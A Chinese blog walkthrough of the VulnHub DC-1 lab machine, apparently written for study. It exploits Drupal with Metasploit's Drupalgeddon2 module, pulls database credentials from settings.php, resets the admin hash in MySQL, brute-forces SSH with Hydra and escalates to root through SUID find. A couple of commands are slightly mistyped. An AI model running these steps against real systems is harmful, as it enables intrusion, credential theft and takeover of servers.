【DC—1渗透实战】

最新推荐文章于 2024-04-27 02:38:25 发布
最新推荐文章于 2024-04-27 02:38:25 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 靶场实战系列 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/126688598
版权

文章目录

环境准备

靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/
使用Vmware虚拟机中NAT网络
靶机 dc-1 192.168.146.158
攻击机 parrot 192.168.146.129

提示:以下是本篇文章正文内容,下面案例可供参考

一、服务器信息搜集

Nmap(也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包)是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)
nmap -sV -p- [ip地址]——全端口扫描并且显示软件、 版本完整信息

nmap -sV -p- 192.168.146.158

在这里插入图片描述

二、网站信息搜集

1. 浏览站点

发现是Drupal的cms
在这里插入图片描述

2.漏洞搜集

msf模块

msfconsole
searchs Drupal

该处使用的url网络请求的数据。
我们来使用这个👇
在这里插入图片描述

三、漏洞利用

msf命令行里面进行payload配置👇

use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.146.158
exploit

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功上线O(∩_∩)O,拿到flag1

shell
ls
cat flag1.txt

在这里插入图片描述
在这里插入图片描述

服务器提权

使用python调用本地shell实现交互式命令行

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
补:目标cms的关键目录:/var/www/sites/default/settings.php

cd sites/default
cat settings.php

发现数据库用户名和密码和flag2
在这里插入图片描述
在这里插入图片描述

1.连接到MySQL数据库中

mysql -udbuser -pR0ck3t

在这里插入图片描述
查询数据库名,表名,进一步刺探

show databases;
use drupaldb;
show tables;
select * from users

在这里插入图片描述
在这里插入图片描述
发现两个用户名
在这里插入图片描述

第一种方法:在数据库里建立一个管理员级别的用户

然后用”增“or”改“更换管理员的hash值
这里先使用drupal的密码生成工具自动生成密码,然后使用”改“语句修改admin的密码

exit
php scripts/password-hash.sh haha123
mysql -udbuser -pR0ck3t
use drupaldb
UPDATE users SET pass='[hash值]' WHERE name='admin';

在这里插入图片描述
在这里插入图片描述

第二种方法:利用漏洞建立一个用户

msf模块

msfconsole
searchsploit drupal
exit

在这里插入图片描述
找到add admin的漏洞👆

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.146.158 -u zj -p zj123

在这里插入图片描述
接着成功登录到后台,找到flag3😄
在这里插入图片描述
在这里插入图片描述

cat etc/passwd

发现有个flag4的用户
在这里插入图片描述

2.使用hydra破解ssh

一、hydra简介
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。

ssh、ftp、telnet、smb爆破等
windows远程桌面连接破解、邮箱pop破解等

hydra -l flag4 -p /usr/share/wordlists/rockyou.txt.gz 192.168.146.158 ssh

在这里插入图片描述
发现密码是orange
连接ssh↓

ssh flag4@192.168.146.158

在这里插入图片描述
在这里插入图片描述

3.提权

还需要root权限
find /root 发现root目录下有个东西
需要提权
才能拿到thefinalflag

1.发现有什么东西可以以root权限执行

find / -perm -u=s -type f 2>/dev/null

发现/usr/bin/find
在这里插入图片描述
2.linux的find提权命令
让其在根目录查找文件,并且执行bin/sh,就有root权限了

touch zj
find / -name zj -exec "/bin/sh/" \;

在这里插入图片描述
在这里插入图片描述
ok拿到thefinalflag.txt,本靶机的渗透结束!

出黎on
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透测试数据库
04-01
PentestDB 1 介绍 本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit系统,能够使用API快速编写exploit,能够批量执行exploit 子域名爆破。爆破子域名,使用域传送、DNS爆破、GoogleHacking进行子域名爆破 C段扫描。C段扫描,支持生成html格式输出文件 服务端应用识别。识别CMS类型、Web服务器、操作系统、WEB中间件等 URI敏感资源爆破。爆破WEB敏感文件,整站备份、配置备份、敏感文件等 社工密码字典生成。根据社工信息生成密码爆破字典 Google Hacking。GoogleHacking,生成URL字典 编解码等功能。支持非常丰富的编解码方式,方便做payload编码 1.2 资源文件 各种渗透测试常用的资源文件,包括各种爆破字典、exploit、webshell、攻击payload等 2 安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux/MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目中的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install lxml apt-get install lxml yum install lxml windows可通过以下方式安装lxml: 到这里找到对应系统的安装包,下载到本地 安装安装包,pip install package.whl 2.2 解决nmap依赖 项目中的C段扫描依赖于nmap扫描器 到这里下载nmap相应版本 在windows下需要设置环境变量,让系统能够找到nmap.exe。 3 使用 3.1 常用脚本 项目中的python脚本提供用有用的渗透辅助功能,根目录下的pen.py为脚本入口,另外script目录下也有其他一些脚本。 3.1.1 Exploit系统 pen.py的exploit子命令提供了exploit模块相关操作,exploit模块是一个轻量级的exploit框架,可以编写各种web漏洞的exploit: 搜索exploit信息 增加、删除、修改exploit信息 执行某个exploit 搜索并批量执行exploit exploit保存在项目根目录下的exploit目录下 例如: # 列举、搜索、注册、更新、删除 pen.py exploit -l pen.py exploit -q appName:joomla pen.py exploit --register exploit pen.py exploit --update cms_joomla_3_4_session_object_injection.py pen.py exploit -d "Joomla 1.5~3.4 session对象注入漏洞exploit" pen.py exploit --detail "Joomla 1.5~3.4 session对象注入漏洞exploit" # 执行exploit pen.py exploit -e cms_joomla_3_4_session_object_injection.py -u http://127.0.0.1:1234 --attack pen.py exploit -s appName:joomla -u http://127.0.0.1:1234 --verify pen.py exploit -s appName:joomla -u @url.txt 注:有关exploit模块的详细信息请参考exploit/readme.md 3.1.2 服务端应用识别 pen.py的service子命令提供了服务端应用识别的功能,能够识别服务器信息,包括: 操作系统 web服务器 web中间件 CMS等 例如: pen.py service http://xxx.com # 开启CMS识别加强模式 pen.py service http://xxx.com --cms 3.1.3 社工密码字典生成 pen.py的password子命令提供了根据社工信息生成密码字典的功能,能够设置不同关键字生成密码字典
ADAMS 进行关节仿真
dbdxnuliba的博客
04-05 3561
转载: https://jingyan.baidu.com/article/db55b609a9d7114ba30a2f97.html Adams中Motion由调用外规划数据SPLINE驱动 在做机械结构的动力学分析仿真的过程中,MOTION驱动函数有时无法在ADAMS中直接找到。可以先对电机角度位置或速度等进行了外部规划,得出了电机位置与时间的一些列相关数据,导入ADAMS,并利用...
万字总结,建议收藏慢慢看!数据库安全之MongoDB渗透!
2401_84266016的博客
04-27 946
日志输出文件路径#错误日志采用追加模式,配置这个选项后mongodb的日志会追加到现有的日志文件,而不是从新创建一个新文件#启用日志文件,默认启用#这个选项可以过滤掉一些无用的日志信息,若需要调试使用请设置为false#端口号 默认为27017port=27017然后在cmd中输入下面命令,命名该服务名为 mongodb验证是否配置成功========参考下文第四点: Windows下图文详解Mongodb安装及配置3、Kali 下MongoDB安装1)导入MongoDB密钥。
渗透测试之【系统与数据库安全
m0_67742636的博客
11-27 666
web安全之系统数据库安全
渗透数据库基础
十五年游戏主程转渗透之路
03-11 1973
mysql命令,渗透,infornation_schema
渗透测试---数据库安全: sql注入数据库原理详解
有勇气的牛排博客
02-12 4088
文章目录1 介绍2 一般步骤3 注入3 函数3.1 常用的系统函数3.2 字符串连接函数3.2.1 concat() 函数3.2.2 concat_ws() 函数3.2.3 group_concat() 函数4 注入4.1 联合查询 union 注入4.2 information_schema 注入5.2.1 获取所有数据库4.2.2 获取指定数据库的表4.2.3 获取指定表的字段名4.2.4 获取字段值得内容4.3 基于报错信息注入4.3.1 三个常用报错函数4.4 数字注入4.5 搜索注入5 sql注入
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
vuInhub靶场实战系列-DC-5实战
05-27
vuInhub靶场实战系列-DC-5实战
渗透测试之地基服务篇:服务攻防之数据库Redis(上)
wangluoanquan111的博客
08-01 384
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
热门推荐
杨秀璋的专栏
07-13 2万+
这是最近自己学习渗透和网站攻防的文章,希望能深入地学习这部分知识,同时认了Na师傅和Rong师傅,知道了人外有人、天外有天,真的很享受这种探索问题、解决问题和分析知识的过程。希望文章对你有所帮助,尤其是学习网站如何防止SQL注入及数据库原理的初学者或安全工程师。如果文章中存在错误或不足之处,还请海涵~ 一.Google搜索知识 二.万能密码原理 三.数据库解读SQL注入攻防原理 1.数据库如何判断注入点 2.数据库如何判断字段总数 order by
小H靶场学习笔记:DC-1
Hack_hui的博客
11-09 370
记录打DC-1靶场的过程及思路
渗透测试之地基服务篇:服务攻防之数据库Mysql(下)
m0_59598029的博客
07-31 325
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 884
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
数据库渗透
qq_35012243的博客
05-18 2018
1.1 快速搭建 discuz 论坛 1.2 使用 kali 下 BurpSuite 对 discuz 后台注入 php 木马 1.3 使用 Cknife“菜函”上传 webshell 木马到网站 1.4 使用 Webshell 查看 mysql 数据库密码并盗取数据库 ** 1.1 快速搭建 discuz 论坛 ** 1.1.1 攻击 思路 想要拿下一台主机 A 的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞。 2、拿到对 A 有一定权限的身仹。如果对方是一个 WEB 服务器.
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值